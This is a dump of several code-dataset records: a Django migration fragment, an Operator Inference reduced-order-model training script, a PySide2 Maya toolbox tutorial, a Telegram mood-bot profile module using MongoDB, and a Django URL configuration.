    '),\n preserve_default=True,\n ),\n migrations.AlterField(\n model_name='event',\n name='edate',\n field=models.DateTimeField(verbose_name='Дата события', help_text='Поле сортировки'),\n preserve_default=True,\n ),\n ]\n","sub_path":"apps/event/migrations/0003_auto_20150422_0056.py","file_name":"0003_auto_20150422_0056.py","file_ext":"py","file_size_in_byte":2003,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"153082028","text":"# step3_train.py\n\"\"\"Use projected data to learn reduced-order models via Tikhonov-regularized\nOperator Inference with regularization hyperparameter selection.\n\nExamples\n--------\n## --single: train and save a single ROM for a given λ1, λ2.\n\n# Use 10,000 projected snapshots to learn a ROM of dimension r = 24\n# with regularization parameters λ1 = 400, λ2 = 21000.\n$ python3 step3_train.py --single 10000 24 400 21000\n\n## --gridsearch: train over a grid of candidates for λ1 and λ2, saving\n only the stable ROM with least training error.\n\n# Use 20,000 projected snapshots to learn a ROM of dimension r = 40 and save\n# the one with the regularization resulting in the least training error and\n# for which the integrated POD modes stay within 150% of the training data in\n# magnitude for 60,000 time steps. For the regularization parameters, test\n# each point in the 4x5 logarithmically-spaced grid [500,9000]x[8000,10000]\n$ python3 step3_train.py --gridsearch 10000 40 5e2 9e3 4 8e3 1e4 5\n --testsize 60000 --margin 1.5\n\n## --minimize: given initial guesses for λ1 and λ2, use Nelder-Mead search\n to train and save a ROM that is locally optimal in the\n regularization hyperparameter space.\n\n# Use 10,000 projected snapshots to learn a ROM of dimension r = 30 and save\n# the one with the regularization resulting in the least training error and\n# for which the integrated POD modes stay within 150% of the training data in\n# magnitude for 60,000 time steps. For the regularization parameters, search\n# starting from λ1 = 300, λ2 = 7000.\n$ python3 step3_train.py --minimize 10000 30 300 7000\n --testsize 60000 --margin 1.5\n\nLoading Results\n---------------\n>>> import utils\n>>> trainsize = 10000 # Number of snapshots used as training data.\n>>> num_modes = 44 # Number of POD modes.\n>>> regs = 1e4, 1e5 # Regularization parameters for Operator Inference.\n>>> rom = utils.load_rom(trainsize, num_modes, reg)\n\nCommand Line Arguments\n----------------------\n\"\"\"\nimport logging\nimport itertools\nimport numpy as np\nimport scipy.optimize as opt\n\nimport rom_operator_inference as roi\n\nimport config\nimport utils\n\n\n_MAXFUN = 100 # Artificial ceiling for optimization routine.\n\n\n# Subroutines =================================================================\n\ndef check_lstsq_size(trainsize, r):\n \"\"\"Report the number of unknowns in the Operator Inference problem,\n compared to the number of snapshots. Ask user for confirmation before\n attempting to solve an underdetermined problem.\n \"\"\"\n # Print info on the size of the system to be solved.\n d = roi.lstsq.lstsq_size(config.MODELFORM, r, m=1)\n message = f\"{trainsize} snapshots, {r}x{d} DOFs ({r*d} total)\"\n print(message)\n logging.info(message)\n\n # If the system is underdetermined, ask for confirmation before proceeding.\n if d > trainsize:\n message = \"LSTSQ SYSTEM UNDERDETERMINED\"\n logging.warning(message)\n if input(f\"{message}! CONTINUE? 
[y/n] \") != \"y\":\n raise ValueError(message)\n return d\n\n\ndef check_regs(regs):\n \"\"\"Assure that there are two positive regularization parameters.\"\"\"\n if np.isscalar(regs) or len(regs) != 2:\n raise ValueError(\"two regularization parmameters required\")\n if any(λ < 0 for λ in regs):\n raise ValueError(\"regularization parameters must be positive\")\n return regs\n\n\ndef regularizer(r, d, λ1, λ2):\n \"\"\"Return the regularizer that penalizes all operator elements by λ1,\n except for the quadratic operator elements, which are penalized by λ2.\n\n Parameters\n ----------\n r : int\n Dimension of the ROM.\n\n d : int\n Number of unknowns in a single least-squares problem, i.e., the\n number of elements in a single row of the operator matrix O.\n\n λ1 : float\n Regularization parameter for the non-quadratic operators.\n\n λ2 : float\n Regularization parameter for the quadratic operator.\n\n Returns\n -------\n diag(𝚪) : (d,) ndarray\n Diagonal entries of the dxd regularizer 𝚪.\n \"\"\"\n diag𝚪 = np.full(d, λ1)\n diag𝚪[1+r:-1] = λ2\n return diag𝚪\n\n\ndef is_bounded(q_rom, B, message=\"bound exceeded\"):\n \"\"\"Return True if the absolute integrated POD coefficients lie within the\n given bound.\n\n Parameters\n ----------\n q_rom : (r,len(time_domain)) ndarray\n Integrated POD modes, i.e., the direct result of integrating a ROM.\n\n B : float > 0\n The bound that the integrated POD coefficients must satisfy.\n \"\"\"\n if np.abs(q_rom).max() > B:\n print(message+\"...\", end='')\n logging.info(message)\n return False\n return True\n\n\ndef save_trained_rom(trainsize, r, regs, rom):\n \"\"\"Save the trained ROM with the specified attributes.\n\n Parameters\n ----------\n trainsize : int\n Number of snapshots used to train the ROM.\n\n r : int\n Dimension of the ROM. Also the number of retained POD modes\n (left singular vectors) used to project the training data.\n\n regs : two positive floats\n Regularization parameters (non-quadratic, quadratic) used in the\n Operator Inference least-squares problem for training the ROM.\n\n rom : rom_operator_inference.InferredContinuousROM\n Actual trained ROM object. Must have a `save_model()` method.\n \"\"\"\n save_path = config.rom_path(trainsize, r, regs)\n rom.save_model(save_path, save_basis=False, overwrite=True)\n logging.info(f\"ROM saved to {save_path}\")\n\n\n# Main routines ===============================================================\n\ndef train_single(trainsize, r, regs):\n \"\"\"Train and save a ROM with the given dimension and regularization\n hyperparameters.\n\n Parameters\n ----------\n trainsize : int\n Number of snapshots to use to train the ROM.\n\n r : int\n Dimension of the desired ROM. 
Also the number of retained POD modes\n (left singular vectors) used to project the training data.\n\n regs : two positive floats\n Regularization hyperparameters (non-quadratic, quadratic) to use in\n the Operator Inference least-squares problem for training the ROM.\n \"\"\"\n utils.reset_logger(trainsize)\n\n # Validate inputs.\n d = check_lstsq_size(trainsize, r)\n λ1, λ2 = check_regs(regs)\n\n # Load training data.\n Q_, Qdot_, t = utils.load_projected_data(trainsize, r)\n U = config.U(t)\n\n # Train and save the ROM.\n with utils.timed_block(f\"Training ROM with k={trainsize:d}, \"\n f\"r={r:d}, λ1={λ1:.0f}, λ2={λ2:.0f}\"):\n rom = roi.InferredContinuousROM(config.MODELFORM)\n rom.fit(None, Q_, Qdot_, U, P=regularizer(r, d, λ1, λ2))\n save_trained_rom(trainsize, r, regs, rom)\n\n\ndef train_gridsearch(trainsize, r, regs, testsize=None, margin=1.5):\n \"\"\"Train ROMs with the given dimension over a grid of potential\n regularization hyperparameters, saving only the ROM with the least\n training error that satisfies a bound on the integrated POD coefficients.\n\n Parameters\n ----------\n trainsize : int\n Number of snapshots to use to train the ROM.\n\n r : int\n Dimension of the desired ROM. Also the number of retained POD modes\n (left singular vectors) used to project the training data.\n\n regs : (float, float, int, float, float, int)\n Bounds and sizes for the grid of regularization parameters.\n Linear: search in [regs[0], regs[1]] at regs[2] points.\n Quadratic: search in [regs[3], regs[4]] at regs[5] points.\n\n testsize : int\n Number of time steps for which a valid ROM must satisfy the POD bound.\n\n margin : float >= 1\n Amount that the integrated POD coefficients of a valid ROM are allowed\n to deviate in magnitude from the maximum magnitude of the training\n data Q, i.e., bound = margin * max(abs(Q)).\n \"\"\"\n utils.reset_logger(trainsize)\n\n # Parse aguments.\n d = check_lstsq_size(trainsize, r)\n if len(regs) != 6:\n raise ValueError(\"len(regs) != 6 (bounds / sizes for parameter grid\")\n check_regs(regs[0:2])\n check_regs(regs[3:5])\n λ1grid = np.logspace(np.log10(regs[0]), np.log10(regs[1]), int(regs[2]))\n λ2grid = np.logspace(np.log10(regs[3]), np.log10(regs[4]), int(regs[5]))\n\n # Load training data.\n t = utils.load_time_domain(testsize)\n Q_, Qdot_, _ = utils.load_projected_data(trainsize, r)\n U = config.U(t[:trainsize])\n\n # Compute the bound to require for integrated POD modes.\n M = margin * np.abs(Q_).max()\n\n # Create a solver mapping regularization parameters to operators.\n print(f\"TRAINING {λ1grid.size*λ2grid.size} ROMS\")\n with utils.timed_block(f\"Constructing least-squares solver, r={r:d}\"):\n rom = roi.InferredContinuousROM(config.MODELFORM)\n rom._construct_solver(None, Q_, Qdot_, U, np.ones(d))\n\n # Test each regularization parameter.\n errors_pass = {}\n errors_fail = {}\n for λ1,λ2 in itertools.product(λ1grid, λ2grid):\n with utils.timed_block(f\"Testing ROM with λ1={λ1:5e}, λ2={λ2:5e}\"):\n # Train the ROM on all training snapshots.\n rom._evaluate_solver(regularizer(r, d, λ1, λ2))\n\n # Simulate the ROM over the full domain.\n with np.warnings.catch_warnings():\n np.warnings.simplefilter(\"ignore\")\n q_rom = rom.predict(Q_[:,0], t, config.U, method=\"RK45\")\n\n # Check for boundedness of solution.\n errors = errors_pass if is_bounded(q_rom, M) else errors_fail\n\n # Calculate integrated relative errors in the reduced space.\n if q_rom.shape[1] > trainsize:\n errors[(λ1,λ2)] = roi.post.Lp_error(Q_, q_rom[:,:trainsize],\n 
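\n                # [added note] Lp_error returns a pair of error measures; per the\n                # comment above, the trailing [1] keeps the integrated relative error.\n                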
t[:trainsize])[1]\n\n # Choose and save the ROM with the least error.\n if not errors_pass:\n message = f\"NO STABLE ROMS for r={r:d}\"\n print(message)\n logging.info(message)\n return\n\n err2reg = {err:reg for reg,err in errors_pass.items()}\n λ1,λ2 = err2reg[min(err2reg.keys())]\n with utils.timed_block(f\"Best regularization for k={trainsize:d}, \"\n f\"r={r:d}: λ1={λ1:.0f}, λ2={λ2:.0f}\"):\n rom._evaluate_solver(regularizer(r, d, λ1, λ2))\n save_trained_rom(trainsize, r, (λ1,λ2), rom)\n\n\ndef train_minimize(trainsize, r, regs, testsize=None, margin=1.5):\n \"\"\"Train ROMs with the given dimension(s), saving only the ROM with\n the least training error that satisfies a bound on the integrated POD\n coefficients, using a search algorithm to choose the regularization\n hyperparameters.\n\n Parameters\n ----------\n trainsize : int\n Number of snapshots to use to train the ROM.\n\n r : int\n Dimension of the desired ROM. Also the number of retained POD modes\n (left singular vectors) used to project the training data.\n\n regs : two positive floats\n Initial guesses for the regularization hyperparameters (non-quadratic,\n quadratic) to use in the Operator Inference least-squares problem\n for training the ROM.\n\n testsize : int\n Number of time steps for which a valid ROM must satisfy the POD bound.\n\n margin : float >= 1\n Amount that the integrated POD coefficients of a valid ROM are allowed\n to deviate in magnitude from the maximum magnitude of the training\n data Q, i.e., bound = margin * max(abs(Q)).\n \"\"\"\n utils.reset_logger(trainsize)\n\n # Parse aguments.\n d = check_lstsq_size(trainsize, r)\n log10regs = np.log10(check_regs(regs))\n\n # Load training data.\n t = utils.load_time_domain(testsize)\n Q_, Qdot_, _ = utils.load_projected_data(trainsize, r)\n U = config.U(t[:trainsize])\n\n # Compute the bound to require for integrated POD modes.\n B = margin * np.abs(Q_).max()\n\n # Create a solver mapping regularization parameters to operators.\n with utils.timed_block(f\"Constructing least-squares solver, r={r:d}\"):\n rom = roi.InferredContinuousROM(config.MODELFORM)\n rom._construct_solver(None, Q_, Qdot_, U, np.ones(d))\n\n # Test each regularization parameter.\n def training_error(log10regs):\n \"\"\"Return the training error resulting from the regularization\n parameters λ1 = 10^log10regs[0], λ1 = 10^log10regs[1]. 
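(That is, λ1 = 10**log10regs[0] and λ2 = 10**log10regs[1]; e.g. the\n        module-docstring guess regs=(300, 7000) arrives here as log10regs of\n        roughly (2.48, 3.85).) 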
If the\n resulting model violates the POD bound, return \"infinity\".\n \"\"\"\n λ1, λ2 = 10**log10regs\n\n # Train the ROM on all training snapshots.\n with utils.timed_block(f\"Testing ROM with λ1={λ1:e}, λ2={λ2:e}\"):\n rom._evaluate_solver(regularizer(r, d, λ1, λ2))\n\n # Simulate the ROM over the full domain.\n with np.warnings.catch_warnings():\n np.warnings.simplefilter(\"ignore\")\n q_rom = rom.predict(Q_[:,0], t, config.U, method=\"RK45\")\n\n # Check for boundedness of solution.\n if not is_bounded(q_rom, B):\n return _MAXFUN\n\n # Calculate integrated relative errors in the reduced space.\n return roi.post.Lp_error(Q_, q_rom[:,:trainsize], t[:trainsize])[1]\n\n opt_result = opt.minimize(training_error, log10regs, method=\"Nelder-Mead\")\n if opt_result.success and opt_result.fun != _MAXFUN:\n λ1, λ2 = 10**opt_result.x\n with utils.timed_block(f\"Best regularization for k={trainsize:d}, \"\n f\"r={r:d}: λ1={λ1:.0f}, λ2={λ2:.0f}\"):\n rom._evaluate_solver(regularizer(r, d, λ1, λ2))\n save_trained_rom(trainsize, r, (λ1,λ2), rom)\n else:\n message = \"Regularization search optimization FAILED\"\n print(message)\n logging.info(message)\n\n\n# First draft approach: single regularization parameter, i.e., ================\n# equally penalize all entries of the ROM operators. ==========================\ndef _train_minimize_1D(trainsize, r, regs, testsize=None, margin=1.5):\n \"\"\"Train ROMs with the given dimension(s), saving only the ROM with\n the least training error that satisfies a bound on the integrated POD\n coefficients, using a search algorithm to choose the regularization\n parameter.\n\n Parameters\n ----------\n trainsize : int\n Number of snapshots to use to train the ROM.\n\n r : int\n Dimension of the desired ROM. Also the number of retained POD modes\n (left singular vectors) used to project the training data.\n\n regs : positive floats\n Bounds for the regularization parameter to use in the Operator\n Inference least-squares problem for training the ROM.\n\n testsize : int\n Number of time steps for which a valid ROM must satisfy the POD bound.\n\n margin : float >= 1\n Amount that the integrated POD coefficients of a valid ROM are allowed\n to deviate in magnitude from the maximum magnitude of the training\n data Q, i.e., bound = margin * max(abs(Q)).\n \"\"\"\n utils.reset_logger(trainsize)\n\n # Parse aguments.\n d = check_lstsq_size(trainsize, r)\n log10regs = np.log10(check_regs(regs))\n\n # Load training data.\n t = utils.load_time_domain(testsize)\n Q_, Qdot_, _ = utils.load_projected_data(trainsize, r)\n U = config.U(t[:trainsize])\n\n # Compute the bound to require for integrated POD modes.\n B = margin * np.abs(Q_).max()\n\n # Create a solver mapping regularization parameters to operators.\n with utils.timed_block(f\"Constructing least-squares solver, r={r:d}\"):\n rom = roi.InferredContinuousROM(config.MODELFORM)\n rom._construct_solver(None, Q_, Qdot_, U, 1)\n\n # Test each regularization parameter.\n def training_error(log10reg):\n \"\"\"Return the training error resulting from the regularization\n hyperparameters λ1 = λ2 = 10^log10reg. 
If the resulting model\n violates the POD bound, return \"infinity\".\n \"\"\"\n λ = 10**log10reg\n\n # Train the ROM on all training snapshots.\n with utils.timed_block(f\"Testing ROM with λ={λ:e}\"):\n rom._evaluate_solver(λ)\n\n # Simulate the ROM over the full domain.\n with np.warnings.catch_warnings():\n np.warnings.simplefilter(\"ignore\")\n q_rom = rom.predict(Q_[:,0], t, config.U, method=\"RK45\")\n\n # Check for boundedness of solution.\n if not is_bounded(q_rom, B):\n return _MAXFUN\n\n # Calculate integrated relative errors in the reduced space.\n return roi.post.Lp_error(Q_, q_rom[:,:trainsize], t[:trainsize])[1]\n\n opt_result = opt.minimize_scalar(training_error,\n method=\"bounded\", bounds=log10regs)\n if opt_result.success and opt_result.fun != _MAXFUN:\n λ = 10**opt_result.x\n with utils.timed_block(f\"Best regularization for k={trainsize:d}, \"\n f\"r={r:d}: λ={λ:.0f}\"):\n rom._evaluate_solver(λ)\n save_trained_rom(trainsize, r, (λ,λ), rom)\n else:\n message = \"Regularization search optimization FAILED\"\n print(message)\n logging.info(message)\n\n\n\n# =============================================================================\nif __name__ == \"__main__\":\n # Set up command line argument parsing.\n import argparse\n parser = argparse.ArgumentParser(description=__doc__,\n formatter_class=argparse.RawDescriptionHelpFormatter)\n parser.usage = f\"\"\" python3 {__file__} --help\n python3 {__file__} --single TRAINSIZE R REG1 REG2\n python3 {__file__} --gridsearch TRAINSIZE R REG1 ... REG6\n --testsize TESTSIZE --margin TAU\n python3 {__file__} --minimize TRAINSIZE R REG1 REG2\n --testsize TESTSIZE --margin TAU\"\"\"\n # Parser subcommands\n group = parser.add_mutually_exclusive_group(required=True)\n group.add_argument(\"--single\", action=\"store_true\",\n help=\"train and save a single ROM with regularization \"\n \"hyperparameters REG1 (non-quadratic penalizer) \"\n \"and REG2 (quadratic penalizer)\")\n group.add_argument(\"--gridsearch\", action=\"store_true\",\n help=\"train over the REG3xREG6 grid \"\n \"[REG1,REG2]x[REG4,REG5] of regularization \"\n \"hyperparameter candidates, saving only the \"\n \"stable ROM with the least training error\")\n group.add_argument(\"--minimize\", action=\"store_true\",\n help=\"given initial guesses REG1 (non-quadratic \"\n \"penalizer) and REG2 (quadratic penalizer), use \"\n \"Nelder-Mead search to train and save a ROM that \"\n \"is locally optimal in the regularization \"\n \"hyperparameter space\")\n\n # Positional arguments.\n parser.add_argument(\"trainsize\", type=int,\n help=\"number of snapshots in the training data\")\n parser.add_argument(\"modes\", type=int,\n help=\"number of POD modes used to project the data \"\n \"(dimension of ROM to be learned)\")\n parser.add_argument(\"regularization\", type=float, nargs='+',\n help=\"regularization parameters for ROM training\")\n\n # Other keyword arguments.\n parser.add_argument(\"--testsize\", type=int, default=None,\n help=\"number of time steps for which the trained ROM \"\n \"must satisfy the POD bound\")\n parser.add_argument(\"--margin\", type=float, default=1.1,\n help=\"factor by which the POD coefficients of the ROM \"\n \"simulation are allowed to deviate in magnitude \"\n \"from the training data (default 1.1)\")\n\n # Parse arguments and do one of the main routines.\n args = parser.parse_args()\n if args.single:\n train_single(args.trainsize, args.modes, args.regularization)\n elif args.gridsearch:\n train_gridsearch(args.trainsize, args.modes, 
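# ---------------------------------------------------------------------------
# [Editor's sketch -- not part of the original step3_train.py] The minimize
# routines above share one pattern: optimize over log10 of the hyperparameters
# and return a large sentinel (_MAXFUN) whenever a candidate violates the
# stability bound, so Nelder-Mead steers away from unstable regions. A
# self-contained toy version with an assumed quadratic objective:
import numpy as np
import scipy.optimize as opt

_SENTINEL = 1e12    # stand-in for _MAXFUN

def toy_training_error(log10regs):
    """Stand-in for training_error(): quadratic in log space, with a
    feasibility check mimicking is_bounded()."""
    if np.any(log10regs > 6):        # pretend these candidates are unstable
        return _SENTINEL
    return (log10regs[0] - 1.0)**2 + (log10regs[1] - 1.5)**2

result = opt.minimize(toy_training_error, x0=np.log10([10.0, 10.0]),
                      method="Nelder-Mead")
if result.success and result.fun != _SENTINEL:
    print("best hyperparameters:", 10**result.x)   # approx. (10.0, 31.6)
# ---------------------------------------------------------------------------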
args.regularization,\n args.testsize, args.margin)\n elif args.minimize:\n train_minimize(args.trainsize, args.modes, args.regularization,\n args.testsize, args.margin)\n","sub_path":"step3_train.py","file_name":"step3_train.py","file_ext":"py","file_size_in_byte":20518,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"637317766","text":"from PySide2 import QtCore\nfrom PySide2 import QtGui\nfrom PySide2 import QtWidgets\nfrom shiboken2 import wrapInstance\n\nimport maya.OpenMaya as om\nimport maya.OpenMayaUI as omui\nimport maya.cmds as cmds\n\n\ndef maya_main_window():\n \"\"\"\n Return the Maya main window widget as a Python object\n \"\"\"\n main_window_ptr = omui.MQtUtil.mainWindow()\n return wrapInstance(long(main_window_ptr), QtWidgets.QWidget)\n\n\nclass PopUpWindow(QtWidgets.QDialog):\n\n def __init__(self, name, parent=None):\n super(PopUpWindow, self).__init__(parent)\n\n self.setWindowTitle(\"{0} Options\".format(name))\n\n self.setWindowFlags(QtCore.Qt.Popup)\n\n self.create_widgets()\n self.create_layout()\n\n def create_widgets(self):\n self.size_sb = QtWidgets.QSpinBox()\n self.size_sb.setRange(1, 100)\n self.size_sb.setValue(12)\n\n self.opacity_sb = QtWidgets.QSpinBox()\n self.opacity_sb.setRange(0, 100)\n self.opacity_sb.setValue(100)\n\n def create_layout(self):\n layout = QtWidgets.QFormLayout(self)\n layout.addRow(\"Size:\", self.size_sb)\n layout.addRow(\"Opacity:\", self.opacity_sb)\n\n\nclass ToolboxButton(QtWidgets.QPushButton):\n\n def __init__(self, name, parent=None):\n super(ToolboxButton, self).__init__(parent)\n\n self.pop_up_window = PopUpWindow(name, self)\n\n def mousePressEvent(self, mouseEvent):\n if(mouseEvent.button() == QtCore.Qt.RightButton):\n\n # pop_up_pos = self.mapToGlobal(mouseEvent.pos())\n # self.pop_up_window.move(pop_up_pos)\n\n pop_up_pos = self.mapToGlobal(QtCore.QPoint(8, self.height() + 8))\n self.pop_up_window.move(pop_up_pos)\n\n self.pop_up_window.show()\n return\n\n super(ToolboxButton, self).mousePressEvent(mouseEvent)\n\n\nclass ToolboxDialog(QtWidgets.QDialog):\n\n IMAGE_DIR = \"D:/Temp/Patreon\"\n\n def __init__(self, parent=maya_main_window()):\n super(ToolboxDialog, self).__init__(parent)\n\n self.setWindowTitle(\"Toolbox\")\n self.setFixedSize(150,40)\n\n if cmds.about(ntOS=True):\n self.setWindowFlags(self.windowFlags() ^ QtCore.Qt.WindowContextHelpButtonHint)\n elif cmds.about(macOS=True):\n self.setWindowFlags(QtCore.Qt.Tool)\n\n self.create_widgets()\n self.create_layout()\n self.create_connections()\n\n def create_widgets(self):\n self.pencil_btn = ToolboxButton(\"Pencil\")\n self.pencil_btn.setFixedSize(30, 30)\n self.pencil_btn.setCheckable(True)\n self.pencil_btn.setChecked(True)\n self.pencil_btn.setFlat(True)\n self.pencil_btn.setIcon(QtGui.QIcon(\"{0}/pencil.png\".format(ToolboxDialog.IMAGE_DIR)))\n\n self.brush_btn = ToolboxButton(\"Brush\")\n self.brush_btn.setFixedSize(30, 30)\n self.brush_btn.setCheckable(True)\n self.brush_btn.setFlat(True)\n self.brush_btn.setIcon(QtGui.QIcon(\"{0}/brush.png\".format(ToolboxDialog.IMAGE_DIR)))\n\n self.eraser_btn = ToolboxButton(\"Eraser\")\n self.eraser_btn.setFixedSize(30, 30)\n self.eraser_btn.setCheckable(True)\n self.eraser_btn.setFlat(True)\n self.eraser_btn.setIcon(QtGui.QIcon(\"{0}/eraser.png\".format(ToolboxDialog.IMAGE_DIR)))\n\n self.text_btn = ToolboxButton(\"Text\")\n self.text_btn.setFixedSize(30, 30)\n self.text_btn.setCheckable(True)\n self.text_btn.setFlat(True)\n 
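# [Editor's note] Example invocations of step3_train.py, following the usage
# string above (all numeric values are illustrative placeholders):
#
#   python3 step3_train.py --single 10000 22 100 30000
#   python3 step3_train.py --gridsearch 10000 22 1e1 1e3 5 1e3 1e5 5 --testsize 40000 --margin 1.1
#   python3 step3_train.py --minimize 10000 22 100 30000 --testsize 40000 --margin 1.1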
self.text_btn.setIcon(QtGui.QIcon(\"{0}/text.png\".format(ToolboxDialog.IMAGE_DIR)))\n\n def create_layout(self):\n main_layout = QtWidgets.QHBoxLayout(self)\n main_layout.setContentsMargins(5, 5, 5, 5)\n main_layout.setSpacing(5)\n main_layout.addWidget(self.pencil_btn)\n main_layout.addWidget(self.brush_btn)\n main_layout.addWidget(self.eraser_btn)\n main_layout.addWidget(self.text_btn)\n main_layout.addStretch()\n\n def create_connections(self):\n self.pencil_btn.clicked.connect(self.on_checked_state_changed)\n self.brush_btn.clicked.connect(self.on_checked_state_changed)\n self.eraser_btn.clicked.connect(self.on_checked_state_changed)\n self.text_btn.clicked.connect(self.on_checked_state_changed)\n\n def on_checked_state_changed(self):\n button = self.sender()\n\n self.pencil_btn.setChecked(button == self.pencil_btn)\n self.brush_btn.setChecked(button == self.brush_btn)\n self.eraser_btn.setChecked(button == self.eraser_btn)\n self.text_btn.setChecked(button == self.text_btn)\n\n\nif __name__ == \"__main__\":\n\n try:\n toolbox_dialog.close() # pylint: disable=E0601\n toolbox_dialog.deleteLater()\n except:\n pass\n\n toolbox_dialog = ToolboxDialog()\n toolbox_dialog.show()\n","sub_path":"CZ_Tutorials/010_PySide2 for Maya (Vol. 3)/25-pyside2_for_maya_vol_3-pop_up_windows_part_2/toolbox_dialog_start.py","file_name":"toolbox_dialog_start.py","file_ext":"py","file_size_in_byte":4752,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"93364493","text":"from pymongo import MongoClient\nimport os\nfrom telegram import ReplyKeyboardMarkup, KeyboardButton, ReplyKeyboardRemove\n\nMONGO_LINK = os.environ.get('MONGO_LINK')\nMONGO_DB = os.environ.get('MONGO_DB')\ndb = MongoClient(MONGO_LINK)[MONGO_DB]\n\n\ndef get_user(db, effective_user, message):\n user = db.users.find_one({\"user_id\": effective_user.id})\n if not user:\n return False\n if user:\n return user\n\n\ndef create_user(db, effective_user, message, user_data):\n user = {\n \"user_id\": effective_user.id,\n \"first_name\": effective_user.first_name,\n \"last_name\": effective_user.last_name,\n \"username\": effective_user.username,\n \"chat_id\": message.chat.id,\n \"profile_name\": user_data['name'],\n \"profile_age\": user_data['age'],\n \"profile_gender\": user_data['gender'],\n }\n db.users.insert_one(user)\n return user\n\n\ndef profile_start(bot, update):\n text = 'Привет! Меня зовут Эляша и я твой персональный ассистент для поднятия настроения. 
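# [Editor's sketch -- not part of the original toolbox file] Minimal,
# self-contained version of the pattern ToolboxButton uses above: intercept
# the right mouse button and show a frameless popup just below the widget.
# The class and label text here are illustrative assumptions.
from PySide2 import QtCore, QtWidgets

class PopupButton(QtWidgets.QPushButton):
    def mousePressEvent(self, event):
        if event.button() == QtCore.Qt.RightButton:
            popup = QtWidgets.QDialog(self)
            popup.setWindowFlags(QtCore.Qt.Popup)   # auto-closes on outside click
            QtWidgets.QLabel("options...", popup)
            # Anchor the popup below the button, in global screen coordinates.
            popup.move(self.mapToGlobal(QtCore.QPoint(0, self.height())))
            popup.show()
            return                                  # swallow the right-click
        super(PopupButton, self).mousePressEvent(event)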
Я еще маленький и глупый, но благодаря тебе я стану лучше.Скажи, как тебя зовут?'\n update.message.reply_text(text, reply_markup=ReplyKeyboardRemove())\n return 'name'\n\n\ndef profile_get_name(bot, update, user_data):\n user_data['name'] = update.message.text\n text = f'Оке, сколько тебе лет?'\n update.message.reply_text(text)\n return 'age'\n\n\ndef profile_get_age(bot, update, user_data):\n user_data['age'] = update.message.text\n reply_keyboard = [['Определенно, мужчина', 'Определенно, женщина', 'Один из шестидесяти гендеров']]\n update.message.reply_text(text='А ты мальчик, девочка или пока не определился?',\n reply_markup=ReplyKeyboardMarkup(reply_keyboard, one_time_keyboard=True, resize_keyboard=True))\n return 'gender'\n\n\ndef profile_get_gender(bot, update, user_data):\n if update.message.text == 'Определенно, мужчина':\n user_gender = 'male'\n elif update.message.text == 'Определенно, женщина':\n user_gender = 'female'\n else:\n user_gender = None\n user_data['gender'] = user_gender\n update.message.reply_text(f'Я запомнил ;-) ')\n update.message.reply_text(f'Спасибо за ответы! Теперь мы стали чуточку ближе) ')\n create_user(db, update.effective_user, update.message, user_data)\n return greet_user(bot, update)\n\n\n\n\ndef start_keyboard():\n start_keyboard = ReplyKeyboardMarkup([\n ['Погугли'], ['Поболтай со мной'], ['Подними мне настроение!'], ['Обо мне']]\n , resize_keyboard=True\n )\n return start_keyboard\n\n\ndef greet_user(bot, update):\n user = get_user(db, update.effective_user, update.message)\n if not user:\n text = 'Привет! Я твой персональный ассистент по настроению! Я еще маленький и глупый, но благодаря тебе я стану лучше.'\n update.message.reply_text(text)\n profile_start(bot, update)\n user_name = user['profile_name']\n text = f'Привет,{user_name}! Я рад тебя видеть! Чем я могу помочь тебе сегодня?'\n update.message.reply_text(text, reply_markup=start_keyboard())\n","sub_path":"db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":3563,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"113742200","text":"\"\"\"act_complementaryMedicine URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.10/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.conf.urls import url, include\n 2. 
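# [Editor's sketch -- not in the original db.py] The profile_* functions above
# form a classic conversation flow; wiring them up could look roughly like
# this (python-telegram-bot v11/v12-style API, matching the (bot, update)
# handler signatures; the token string is a placeholder):
from telegram.ext import (Updater, CommandHandler, MessageHandler, Filters,
                          ConversationHandler)

updater = Updater("BOT_TOKEN")          # placeholder token
updater.dispatcher.add_handler(ConversationHandler(
    entry_points=[CommandHandler('start', profile_start)],
    states={
        'name': [MessageHandler(Filters.text, profile_get_name, pass_user_data=True)],
        'age': [MessageHandler(Filters.text, profile_get_age, pass_user_data=True)],
        'gender': [MessageHandler(Filters.text, profile_get_gender, pass_user_data=True)],
    },
    fallbacks=[],
))
updater.start_polling()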
Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))\n\"\"\"\nfrom django.conf.urls import url\nfrom django.contrib import admin\nfrom act_complementaryMedicine import view\nfrom django.conf.urls.static import static\nfrom django.conf import settings\n\nurlpatterns = [\n url(r'^admin/', admin.site.urls),\n url(r'^get/', view.get_test),\n url(r'^post/', view.post_test),\n url(r'^i1/',view.register),\n url(r'^i2/',view.repeatCheck),\n url(r'^i3/',view.login),\n url(r'^i4/',view.retrievePassword),\n url(r'^i5/',view.getDoctorBasicInfo),\n url(r'^i6/',view.getDoctorDetailedInfo),\n url(r'^i7/',view.updateDoctorInfo),\n url(r'^i8/',view.getExpGroups),\n url(r'^i9/',view.getExpGroupPatientsInfo),\n url(r'^i10/',view.addExpGroup),\n url(r'^i11/',view.deleteExpGroup),\n url(r'^i12/',view.updateExpGroup),\n url(r'^i13/',view.addPatientToExpGroup),\n url(r'^i14/',view.removePatientfromExpGroup),\n url(r'^i15/',view.getPatientsBasicInfo),\n url(r'^i16/',view.getPatientDetailedInfo),\n url(r'^i17/',view.addPatientInfo),\n url(r'^i18/',view.updatePatientInfo),\n# url(r'^i1/',view.register),\n# url(r'^i1/',view.register),\n# url(r'^i1/',view.register),\n# url(r'^i1/',view.register),\n# url(r'^i1/',view.register),\n# url(r'^i1/',view.register),\n# url(r'^i1/',view.register),\n# url(r'^i1/',view.register),\n# url(r'^i1/',view.register),\n# url(r'^i1/',view.register),\n# url(r'^i1/',view.register),\n# url(r'^i1/',view.register),\n# url(r'^i1/',view.register),\n# 